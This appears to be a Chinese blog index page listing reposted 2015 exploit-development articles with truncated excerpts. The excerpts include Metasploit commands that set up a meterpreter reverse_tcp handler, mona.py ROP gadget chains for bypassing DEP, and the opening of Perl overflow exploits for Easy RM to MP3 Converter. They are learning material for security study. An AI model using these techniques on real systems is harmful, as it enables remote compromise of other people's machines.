- 博客(14)
- 资源 (3)
- 收藏
- 关注
转载 导出内容到文件
int LogToFile(char* pFilePath, WORD* pBuffer){ int nRetCode = 0; FILE* pFile; pFile = fopen(pFilePath, "a+"); if (NULL == pFile) { printf("Fail to open file!\n");
2015-05-30 20:54:41 359
转载 ReadProcessMemory与WriteProcessMemory用例分析 (转载)
http://blog.csdn.net/shifters/article/details/6750353
2015-05-30 15:15:23 565
转载 反弹stage shellcode到meterpreter
1.在肉鸡上运行stage1的shellcode2.在kali上运行metsploit framework3.执行下面的命令msf > use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/revers
2015-05-12 23:17:09 724
转载 wireshark 实用过滤表达式(针对ip、协议、端口、长度和内容)
首先说几个最常用的关键字,“eq” 和 “==”等同,可以使用 “and” 表示并且,“or”表示或者。“!" 和 "not” 都表示取反。 一、针对wireshark最常用的自然是针对IP地址的过滤。其中有几种情况: (1)对源地址为192.168.0.1的包的过滤,即抓取源地址满足要求的包。 表达式为:ip.src == 192.168.0.1 (
2015-05-11 21:45:09 351
转载 编写immunity debugger插件
__VERSION__ = '2.0'__REV__ = filter(str.isdigit, '$Revision: 557 $')__IMM__ = '1.8'__DEBUGGERAPP__ = ''arch = 32win7mode = False# try:# import debugger# except:# passtry:
2015-05-05 22:24:02 947
转载 编写Immunity Debugger插件的教程
https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/
2015-05-04 21:43:42 2037
转载 数组越界溢出利用2--修改前方的某个字符串的长度位,将长度位改为较大数值
http://bbs.pediy.com/archive/index.php?t-155555.html利用该数组越界漏洞,更改option cache前方的某个字符串的长度位,将长度位改为较大数值,这样该字符串就可以读取该字符串后面的所有数据,因为长度没有限制。通过获得该功能,先将该字符串所在虚拟空间的准确位置测算出。通过获得的准确位置和内存任意地址读取功能,获得刚才option数组的基地址
2015-05-03 23:05:51 450
转载 rop_gadgets使用方法
利用mona.py可以生成!mona rop -m msvcr71.dll -n这部分gadget能够将后面的shellcode变成可执行的代码段!,后面直接跟shellcode就ok了rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX
2015-05-02 15:11:19 2005
转载 Universal DEP/ASLR bypass with msvcr71.dll and mona.py
转载自:https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/IntroductionOver the last few weeks, there has been some commotion about a universal
2015-05-01 22:51:49 630
转载 bypass dep egg hunter
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/#-------------------------------------------------------------------#corelanc0
2015-05-01 21:30:40 721
转载 适合中文版本的Easy RM to MP3 Converter rop 过depexploit
#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be#-------------------------------------
2015-05-01 16:46:45 891
转载 Easy RM to Mp3 Converter测试rop的代码
my $file="rop.m3u";my $buffersize=26094-20-8-4;my $junk="A"x$buffersize;my $eip=pack('V',0x100102DC);#pointer to retmy $junk2="AAAA";#compensate,to make sure esp points at first rop gadgetmy
2015-05-01 10:14:43 421
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人